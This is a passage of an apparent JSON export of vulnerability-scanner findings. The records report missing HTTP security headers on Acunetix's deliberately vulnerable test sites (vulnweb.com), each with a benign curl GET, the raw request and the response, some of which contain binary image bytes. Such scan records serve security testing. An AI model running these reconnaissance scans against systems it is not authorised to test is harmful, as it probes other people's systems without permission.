/�ع^\u0010�`�\u0005\u0001ƢuM/P��%���L��1H���e�5��&с�(]��!G\u0003R:�\u0014J\t��4��e�y���%�\u000e���|g\u0019�\u0001$�~f�=Uj�u\u0015�Jj��AQG:�-c���������\u000eq��#��ˑ����~r0s��˷n�����l�s1���GIw�\u0012CW\u0004���v�s�G\u001c\u00022\u000e\b������sQQ\f��\u001dE-<2"��� �eV��q��9��r\u0018����0�Xk�\u0006����\u0014J�u��\u000e��\n2�\u001d��2.\u0014r@<x�k=MT߄\u0012,P��,-Q\u001a�r��=L1�p`s���x�=�hk�#9#ӧ�\n�C�'�f�>�h��%���^mv��K�]R�5=��;>%œ�8\u001bO,7z�g蹵%ud�2=�R:�w�D\u0011�\u0013�\u0017n���\u00047<�\f�\u001b�AƑ��Aq�|=���-p\\j\u0016&�U\u0003d����X�0US\u0019l`\u0005*��g\u0015���x��!�����\u0014HY���9�\u000f��og�k�6��8;��&�Vq�#ܕ�����z��T�9q\u0018\nN�p\u0007�Q��-\u0018��\u001aeK�B\u000f ����\u0017d.*Ȱ�U=��M|���i�A&�0ʮ��A\r�O>x��\u000f �r�^����b��i]c�!M嘜\u0001�;� \u0001�<�3_QJ�j�\b\u0012/y�Ā(p�,�W\fW!q�\u0004z��Ƞ��e�\u0011�_Qr��Ă\u001bz%E<�����Gc�S\u0012�|����3��)�"�{\twq���㺴�����̍ÇM5�׺�@����V�m��\u0019dd��d��!]��)��%Gd�\u0017h݃��wr���{b�jƪ\tQOH#\u0005�y�1���7�p\u0014��\u0017\frqik�K=m<�co����r�\u0015��ͶH"pCD���\u0013��@*FA\u0019:�q��\u001c��Qx�?��JcV���~�&U�\u0018�\u001e�ަ%@!�\u0018k���TD̐5\u001d����[��(��;���\u001b}�.VO̩%�\u0013��B���\b+�FőNH��\u001c0�:9��CGM\u001c\u0014�G\u0014(X�"�\u0001>O�p�>p��4\u0003C%e��=\u0015E��FD�1��ң\u0010��Xn�Y\u0018\u0016![,U�쓫UCMM\u001b�m\u0013\u0011����ŞA;\u0004��q��(\u001fh�t\u000e�G��t��\n�\u001b?���� �~���\u0007��eH\u0016\u0015!�\u001c�rc��"eo���׌�����\f!)\u000eO��\u001b�ttQ��p\fq�#2�Ԝ\u0003�\u0007?��[���5]Z�Dp��6KHi�F�����d k�C��\u000bURW%1h�f�0LNHʹ\u0005pp�[$\u00128�1�����4k4k\ftp�Q�j\u0014\u0006\u0005���\u0004d�b>��涁d1\u0019^I;_/u�`�U�Ͼ�PO�(\u001eڪ�Sb'\n9�\u001a����;�Q�\u001bco�V��(�o.�`\u001e�砺��=\u001bU4�_s���̴�0H�`�]�%�ڛd9\u001e��ǖ�jΣ�{���%m��$��Mٍ�i�A�~�\u0007 ��g!��+����X��G'|�L��\u0015�U5��F\u0019��8���^K\u0013C̣-9�m\u0015<w\u0010�\u0019��{���|A�Z��qhb��X)��V.�\n$��V��>�Ab����3���m����Z�����h�H�ե��nL��!M���#:=�-Cp4��V��e�d��\u0004��$�]�9\f�\u0001�<c\u001ccZGZOWm����Ve���5c*&��O�n�9<����5΢�ݣ9\u0019�����MyBQ�wY�w�*\f\u0001fWڏ\u000e��\u0012��\u0019�8]�a\u0019\u0004��\u001fQ[SU���\u001c\u0014�ћ\\Tp\\.\u0017j�V���!\u000b\u0012�QcUe-�d����P;����E4d�)h��3���� \u0012\u0001ǶH��uk}ɵ-.����gO��7;G���-ӿs�N�VDA\u0019ld�J�2$\u0003��p���7U.�Y%��Z%�����e�\u0003~>V%X��'����\u0018%z�WM;F�v\u001f�����é����}?UCp�[�vj�Tn��~�ɂ�F1����O,t��q�\b��Ϗ�T��m��8;��+A�KUl�W$�{c�;��ȩj'W\u0006\u0005A�\u001bҪIS���<��\rc\u0015\u0015�_���qV\u001d�aI6\u000e��]�\r�U���\n�[WY]h�J��m��WYd�����J�(��Q\u0013v��@_�Q��s�ܱ��5��A\u0007b��9h�+$�UWA�Hm�GX�\u0003\u0003f�ƒ��Y%����.'\u0019=3���\u0015E�����\u0001���r��A�x^E���@'����\u001af\u001bF��6��@�<�",c��J)c�!|\f�g�\u0001���%�\u000f��m!xo��\\���9���<U���<�\r��OG\u0019�D�3�F|�i�*������.�\r\u001fv��X;��h{���\\\u0005]�rJ���<�:����D�;!��"�v�z�V+����O�V���xRV=Ѝ�\u0004��D���j��\u0015$�M��:\u0003�T���ۜ��[;�\u0010IfR�N\u000b\u001e[�\u0006p<h�)�#Ս\u000fo|�\u0010e:�|�\u0011��c��\u0010�}�uf�\fq�������-Mgj&bx\u0003?MA��e\f$�H$\u001c4r.�S�y\u0007�\u001f��t�\u0007�:�c�yo\u0018\u001a\u0005"��\u001b��5c�����z\u000e\u000f��Е\\�T��[N��;��*�i��U�e�$c �yʰP��[\u00168��\u0014\u0014o�<=\u0013�SG\u001f\f�3�\u0002|ꅪ袞W��Zр�;�\u001e\u0018{6>d?�\u0006\u001b����}_��Y\u001fn�R�H\u0003,sQwx`;\u001dH �\u0018��\u0004{\u001d\u0015^�n���vJ�=\u001a\u001b�D��2mٖ*@E\u0001�*\fP\u0007�F2F�nW8�\f' �d\u001d��m���o\u0017Q�[t\u000f�j���e\u0013R�OGN�ݎ�\u0011\u001231J�!US�2\b��r\t'ZM��Yx��d\u0011��W�Y�*e_F\u0019\u0015��h��K\u0002���Iпº�T\r;�f���Q+�������;{{�g�\u00060�c�t۽eB[n]�I��Pc\u000b\u0018\u0007\u0001pp\u000f�\b9����\u0005d�\u0013?��\u0001��s��׿�4T�������|J��\u001a��\u0015�6���i\u0016)���\u0001e��rB�\u0007��\f\u0002\u00179\u0004\u0003�z:���G/e@���Z��j��=\u00038P?P��>\u0017\u001bpwj��\u0015l7\u001b\u001d�\u000b�(��\u0011\u0011hX�����\u001f(\r�b\u0014��\u0017\u0019k��m���r��jAFn�R1�R�!�=�n�h-�8�=@s����5��7G�����P5\u0014�Ԟ'\u0015�ݮL�)G }�I֫���g\u0002��\u0005��cC\u0015K�d�Ͼ>�i�'v͏��\f�\t��#w_���:k$��ֺ���I\u0017a@\f�͂�\u0001l�2�3�S����������4v0��02����\u0001$\u001e��ާ���ʐq�*L�\\\u0005{DP�Wi��V�*AK��ʛ�-$S�L�5�\b��I\u0004\u000f\u001c�e���,��X2�����#`\u001c��[`>��`��1*�{��1b\u0014�T����\u0004�G�\f[�����4�Y]�E\u0010�!��\n���\u000f��\u0015\u001c��\b��\u000bE(���q�<���Γ<#\u0019E���\u0007�՜S}1�\u001d\bQ�IRf\u0014�\n�K�y�\u0010��0��\b\u0018��d��8��3�u�H��\u00063"�\u001e�\u0004�G�\f\t\u0007�i�U�9�����*-ҵ��\r\u0011\u0014�q���-ܳ��R\u00179S�X�A�\u0006\u001c0#ʌ�FG�A��\u001fC�B��c�kl��0��\u0015��:\u0019\u0003۸U�3Av�]��Z�yv���0dm�\t\u0001���v.p\u0006\\~ڕOr�E���\t)��\u001b�\t$\u001b{�=���8\u0005�ό�y\u0007T�N�P!�z��V�gJh���ul*�KnU���\u0003#E6n���\u001b\u0005'P\\\u001e��S\u00075�,�;�\u001d��[i,\u00102���n�s�LUܤ�J8��\u001d���'��a��_\u0017\u0017\u000e\u001c��W�Q\u0006J�<-�Q����pA��\u0011��t��\u001a�����U���\u0012\u001aVffyQQ1�A\u0019Q��C`�DղR,]�Y�,^'ĉ\u001dJ+�,>W��Xd`�\u001c\u0010u��1��Id���As5MJ�:KT�+\u0018�f�-�,��x�q��[�]���������^�Z�K�����B��<�p�.�\u0012���\u0003�q�\u0019��0H`\t*qQ]++J�K$/,f)\fNW��ʶ<��<k���N�ʉ(�\u001a�\u0001-+2��8ǥW�1��H,I$�\u001d\\�mt�+�2K<�����X��\u001fՖl�����^��bi�n�[@b���"n���Ώ���<���EZU�t\u0010�\u0015,��WԹQ�F\t<`6���\u0010��K��l\u0014��̴��B���Ű�s�� ��ƾ|���])^��\t���7Ԏ\u0007k��|��9\u001e�\u0007�g�/�3T��2PR��[䥑��z��L\u0018��W�!�eJg#\u0007��u�\n|\u00170\u0002�~�_Ң�s���'��QY��n\u001f���J��\f��%cR\u0017�@,Wv|��G,�?X�kii�\u0015@��a}��G!,P\f�\u000f|�\t<\u0003�h{�� ��f\ti��2��2����\u001c��X�\u001c�\u001fvÝہ\u0019\u0007X���i���\n���m E,���dv�\u0017R0�\u0001�\f��\f���E%��4�\u0001g\u001e#l\u001f��DI8n���i���?m�D�l�U�\u001dxl6<��\u001f�\u000f��+���� !�x�⎵�\u0005�^�c�\u0013hR\u000eO��,Ř�\\�9ZZ��1��du\tU\u001b�$�>�����3h�j��\u0015�\fdp]\u0002'���\u0019S���8\u0004k@�ė��q\\n۪�\u0019e�Y\u001d�QZF$�\u000e\t��'?3\u000f\u0007\u001aZZAZ��\u0018�\f\u001e>���d����z��\u001b?Kt�[��~k\u000b�U������j1�`\r���\u001f�`\n1#,x\u0007KKU\u0016�L\u001cG|��O^>0\u0017���S$K;�����6bU\u0001bH\u0003<d��\u0016P�r�\u0018�\u001aZZmnF\bJn��aL.����RQ�Ϩl�5\u000f"�S_\u0005;��kly\u0002�\u000f�\u0007Ζ���$S���\u0003B\u0001��U_\r�puWX��wf��&\f�,m���-��\u0002F\u000e9ǂ5�X�d��\u000e��鈒�A\u0014i\u0014O�,\u000b\u0014;���ң��Ϝaik�{@���\t��\n���N�%��IGE\u0005������\u0018鷡U%�\t\\�\fĐ���\u0007�A9ڸ1�J����ui_RgM�Yʾ\u000fv#��r}M�?1�x��֩>*Fqk���9�E��T�5L��\u001bܖ8\u0018\u0019Ή�\u0016��A�6x�j��\u0013ԤNar��\u0010\b�A������w\u000f\u000f�\u0011�:�\u0007�hi\u001a�4��)�nW\n�i�a$B\u0002E6\u001dP�\u0003��d���i\u0005���D�T�(�\u0019\u000b�\u000br�P��@��\u001f�KK\\�W��X3տ�՟#�VY���C\u001d\u0002�v;�U��\f�HwaDn���1������m��VR�\u0013;,Ԑ�6�\u000e\u0019�$\u000e<iij���LM\u0005.��+��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1006, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19", + "discovered_date": "2024-11-13T02:42:50.844Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests/pmwiki_2_1_19 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:25 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/pmwiki_2_1_19/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/pmwiki_2_1_19/</h1><hr><pre><a href="../">../</a>\r\n<a href="scripts/">scripts/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1007, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/8.jpg.tn", + "discovered_date": "2024-11-13T02:42:51.188Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/8.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4139\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:25 GMT\r\nEtag: "4dca64a1-102b"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0003\u0004\u0005\u0001\u0007\b��;\u0010\u0001\u0003\u0002\u0004\u0002\u0006\b\u0005\u0004\u0002\u0003\u0001\u0002\u0003\u0011\u0004\u0005\u0012!1AQ\u0006\u0013"aq�\u00142T�����$B���\u0015#3�Rb4r���\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007��(\u0011\u0002\u0001\u0003\u0003\u0004\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011!\u0004\u00141\u0005\u0012AQ\u0013\u0015"B2ab���\f\u0003\u0001\u0002\u0011\u0003\u0011?�S�K��@�\u001bU\u0010z�~\u001d*D���@e��\u0012+�oQ��Vߩ�}I�����{9%L�Oy\u0014ÃX�z�?��h�"2��0\u000f�5ޤѺ�\u000bU��Z|\f���vv�����\u0003)����i��R���Eã�o�t\u001f\u0014\nc�5�uB�\u000fq����\u001b���t�H�)�l\u0007�� N\u0015{\u001e�\u0003�U]�7\u0012`�\tM��aT��h�k�-&\u001el)=�\u0002�F\u0013k��\u0018���W6��$��S��u�\u000ey�eQ��\u0015�I9g��\u0017�0$�\u0015��56\f�m��#�����N�Oq�����Ʋh|���I/2\u001a,-���$w\u001d~uE�[ ������V�����"<�H�\f��;�\u0015R+.A��G.F\u0018K\u0003vTڞ�e\u0013��>�\u0002p\u0007`�_�:�\u0018\u0002�0A�ދ�C�\\!�\u001eJ�����\n�H�U+Z�wQkXBS�m�\u0014װ�3B�Ȏ\u0019������+J7�\t��hI���\u0016j\u0003�G΋��{C?\u0018�\u0013`6�d��3�=s��`��(�ȟ3�����\u001b'��wཥ��W\u0005�M|b��\u001fW<ظ\u0007�\t�\u0015Q�����\u001e%?J3�\u000f�����[\u000e7\f�b�օt� 3�.\u0006���趹\u001f����FYl=���R�a�\f�B���YO�\u001f���C_:i��ײ��FY,=���R�a�\f�b���YO�\u0012�\u0007�e@Gq�Յ�&G���[\u000fhg�\u0014�X{C?\u0018��\u0019t� \u00118j�\u0012�\u0011�jSa;2G�\u0013F�,=���Rɇ�C?\u0018��#��`8�ZOe$yԨ�RwfO2h�%��3��Yp�hg�\u00147�}6��\u0010\f(��\u001esK��De\u0003�Q�\u0016#k�~1K�^���(oE��~��0����OvSL\u00188V�\bO�@��{K_\u0018�E��埌Q�1�NH�\u001c��� M������\u0013���;W$�ӷ�\r�\rZ�$;m�c(\n�T\u0001�I�4��~��Ņ�׽z\u0016�\u0014 \u0001�E�$�xk\u001bl8p�ϨR�\b�\u001d-Ŵ;���L!��V\u0016�\u0002�+�\u0003��\u001f|�u��b\bk�.:�\b�LƁZ�Ѓ�X���h/���.B�eH))!! H�!;lg�0▪E�}P}�(���)#(%[\u001d���YWQ�J�.���]��b/\u0007\u0002\u001cs�@P$����M����\u0012�SM�^\u000e-A\t܉�G\u0018�\u0016��o\u001crԼ�E�u�+*���F�.���V��˶�\u001a��-#+�7\u0004J\u0013�a\u001a� ��\u0002$M\tu\u0019���;e��Yx�(�6\u001c�!\u0004�Y���\u000e����b��\fN�\u0019E�n��#�m��9���H1�\u001f��ڠ��Ɉ���[j\u0015�!�0��\u0003\u0007�&"\u000e�j)�8��Iq�f��}��\b\n'|����Y+7r�J\u0017�7�I�U~�����Gajȩ�>`x��Ķ��8��6�]:P�FE�+*Q�\u0012F�\u00065\u0010�Tq�C\u0007yƔ��\u0010��\u0011�=��\u0019'�y�v�l�p�_\fqn+�]����$q\u001eQ�?\u001aYW����\u000fd}\u001a��q7\u0015��۔��\u0004��\t\u0002\u000f\u00025\u001ae\u001cF���8�$�\u0016��\\C\u0004f��2�\b�\u001a�5\u0011���\u0002��î[�KL�խh%N\u0013�h�\u0004�\u001c\u0001o:�d[�]�Y\\��бd�W(\u0005��\u0003S�\t�\u0013��Ũ�{�\u0013�<X4��1\u000b��,ߘ\u0004���\u0012��<9H��4�X��\r�p]Y�\u0003�\u0019"7�Q�\u0015�/�ww�u,\\:۩�\b�*ˤ�7\u0018���o�����`k�\u001a]��mEJ%Dd��"gS���\u0013�=\n�he��1%J/\u0016\u000bn�Q�۾�\u001fq�<م$�j�=.�R�/�S�hO\u000e�\u0012�$��������Ze'e\r9@�֯�ݦ'���\u0012P\u0014�\u001c���se��\u0003A��jZ�����-4�Y\u001bk����r�TBGorv\u001bӏK���}I\u0003i\\��7��0���T�\u00044�k�\u001d�$��;N\u0013vm\u0014���ܘ�Gw\u0012|\u0006��������\u0005�\n�.�p�t����r�皤\u001d0�*���\u001d�SC\u0016WV�o�9�|��C���J���C"4���\u0013R�v�.��\u0019�\u001bG��VHL\u0002\u0006i�\u0006����ޒ]B\nV�\u0019i�l�β�F\u0012\u001ce���Ќ�@\u000e�>\u0014��\u0016�YԄ�ⳒN�����x�\u0016�u���\u0010BB�\u001c�T���\u001c7�4.����x�(�V\bB3��6�غ��/�\u0012îu��$�W]@�����\u0016�a͵�4\u0014\u001a�\u001ey�\n@�'��\f�\u0004F��\u000e\u001a�{���ܦ�(��Fl���*ݻ*��T\u0014����Q�*\u0007�\u0006i�"���\u0010�t���!qw��ݷ�>�\t�cI\u0011��Y�[\u00168��-\u0015t�>��P�ҳ\u0015&`(�\u001a��üP-���1��H\u001dA=��ӕ\u0016٭�p�mՙ�tR\u0002���\u000f�w���8G)\u0007�K�]N4�Wn�\u0010�\u0003,�\fs\u0007]�3"^HPK�F�H\u001a�p�oDNa]K�2��HP\b��y�}��U�,57=Z�n��1\u0019c�����U�\u0016\u0001c\n͉�\u0016���U��\b��Jں��j���\u000e��B\u000bn%3\u0005�F�{ֵ�\u001bl\bB\u0019lI��))H��\u0003a�\u001d��S\\�n\u001dYm$+)�刐 �\f\r�����u'��0��Ҝ�i!JP�,L�\u0001\u001aL��\u001fJ�|�,p�KRB^t\u0005����h;�j�Ͳ�ԧs��H�V��m�\u0001�����C8�,�!���;�bg:�\u0004�5�\u0018\u001a��.�\u001e����[�\u0002oqE�\u0013n��R\u001a �\u0002x}k�z\u0011�3��\nn��9n\u0002V�$���Q׈\u0002I܃�y& �\\�T��F�L@\u001e\u0002���^\u001e�k�u���D\u0018��+�^��\u0004�\u0019\u0013�Y�\u0015��\u001b[莩�ħi�\u000f�:���c�<\u000b�6\u0014d�*$����L��]�\tm����\u0002\u000e�R��b���)& ������q�@��]���U��2r�)L�����,=�ш\u000b�”�܅(\t��\u0015�\u0004�?:1w\u0017��ZP��%\t�`(���D��.� �q��!��Q���Y�w+��\u0012�,)X�a`6�\u0018��*x�1\u0014K�Z��\u0007�z�,��HS\u0004�)\u0006\f�G\u0001 ���\u0018��ıD���*ԭZ7��\u0015��\\=\t’�R-���\u0010]�h��]~T��e(Ő\u0005�p���\u0004\u0003�\u001a�*+2kZ�\u0015ZD\u0014\b�YB9V�p\u0002L�Ԥ��IWn��\u0016��m&@��L�37\u001a��RX)YЂ)�� \tN\u001eop�/�R��\u000eGF�DhF�6:�M2ѻ�[��\u0001SZ\u0012�Ǻ�C�Akv��Q\r�\u0018:�H��D*]�U�H\n�II\u0013\u001bH\u001e\u0015�nQn-`(����G\u0010�\u0013�v��\u000e����5a\u0017�D����u���x�\by���\u0002#��\u001bT��J�z�\u0007Q��c_�Y%L(%o\u0010hu�7\tZb\u0012�"u��H�Tn\\�ܽVT\u0015+�\n�\u0012\u000e��X�踸jє�\u001a�~�뫺ZD���c0\u0004\u001f�W�d.��Iq3m`��c9\u0019\u001bo��Y>C���-�%���d����'X'�O��[��n�ajNl��\u0001������f�:V��ʄ'a�km$�\u001e��S\u0002�y�\u0015\u0003A�_€a�.�\u0001�!#���J�I�N�����g �Guk�q`\u0010��-�/1\n'y��/4�25\u0006x�\u0014��\u0010u�\u001ba�`%:�G\u00045�3j��H8��\u0004��PU�'¶1|=~��[Z\u0003-���:�y���\u001d\u0012e-\u0002�$�� \rD�υ[�R�c\r-)!\u000f9�W08\b�|�\u0014�7VȄX&(ղ�s\u0002\b%*�\u001fޝ�\\e\u0018��Wn���O>:���&�\n\u001c$fȭ��@�\u0002� (F�)�˽Ir\u0017$�٣qg\n��\u0019�\u001b����T�\f\u001f�\u001c�6�����(��'.i�׉�����ʙ�;q��S���FRM�J�R\t�\u001b�\u001fÊ�*���0EJ���� \u000eU�\u0002�\tY�䟥[w�\n�Ӑ�P��W\t5��6�\u0001eAGI\u001a\u0011�UD)eq$�w�|�VR\u0012�\b�t"L�Ƅ��\t�ڛ��L�s\u001e4�|��\u0001\u0001�\u0001���J�2�G7*����&\u000e�\nT��<\u0012����vaCj����*p��\u001b�#�TEڒ������M\u000f=�B�'bi�)?\u00029�y-�.V���\u0004�́���]�:�\u0015��4����rgi֚�\u001f��U��:xҚ\u0007�\u0012�p�У�S�\rj�M���\u0006�x\u0011�R�O�uQ<�Y�\u0014��J�O}3�Q�懲\u0015�ҖH\u0003��L٥e!*�xD�a\t#:\t���J�\u0010��\u001c��&*�)"�(ˆ\u0014aL\u000b\u001bR��\u001a�\u0010A(<x��P�J�Uqrd�5#6�'�Z\r::��\u0010L�sN���"��w��²z�m*�4�7&\u0016gp5=��R��*A�P����h��ي�ՙ�*%i@$�`i�k!�!S\u001a�|�ҥ\\�\u000e��$\u0014�\u0002t�j\u00022�@m R�W�1f̤�����\u0017�\u0012��p��J�\bԵ(�cz������iR�PV�\f�y%m���\u001fqS%\u00031\u001e?*T�>E\u0011\u00039\u0011�>�j�\t�>�R�Q\u0001�N�\u0014�z�@ޕ*Ҹ2ˑ�\u00026\u001bTKBH:R�Q�\u001c[I))\u0012\u0007q�LI\u0001\u000f\u00109q�J���j��4���P��\\P\u0011=��Uf���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1008, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 112, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://www.vulnweb.com'", + "type": "http", + "http_url": "http://www.vulnweb.com", + "discovered_date": "2024-11-13T02:42:51.472Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: www.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:26 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You 